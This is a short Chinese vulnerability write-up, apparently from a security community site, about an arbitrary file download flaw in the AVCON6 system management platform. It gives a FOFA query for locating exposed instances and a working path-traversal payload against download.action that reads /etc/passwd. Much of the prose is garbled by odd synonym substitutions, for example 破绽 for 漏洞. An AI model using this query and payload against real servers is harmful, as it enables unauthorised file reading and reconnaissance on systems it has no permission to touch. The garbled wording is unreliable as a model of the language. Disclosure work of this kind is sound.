AVCON6 系统管理平台 download.action 任意文件下载漏洞

破绽描绘

AVCON6 系统管理平台 download.action 存在恣意文件下载破绽,攻击者经过破绽能够下载效劳器恣意文件
 


 

破绽影响

AVCON6 系统管理平台
 


 

破绽复现

FOFA

app="AVCON-6"

登录页面

图片[1]-AVCON6 系统管理平台 download.action 任意文件下载漏洞-孤勇者社区

考证POC

/download.action?filename=../../../../../../etc/passwd

图片[2]-AVCON6 系统管理平台 download.action 任意文件下载漏洞-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞15赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片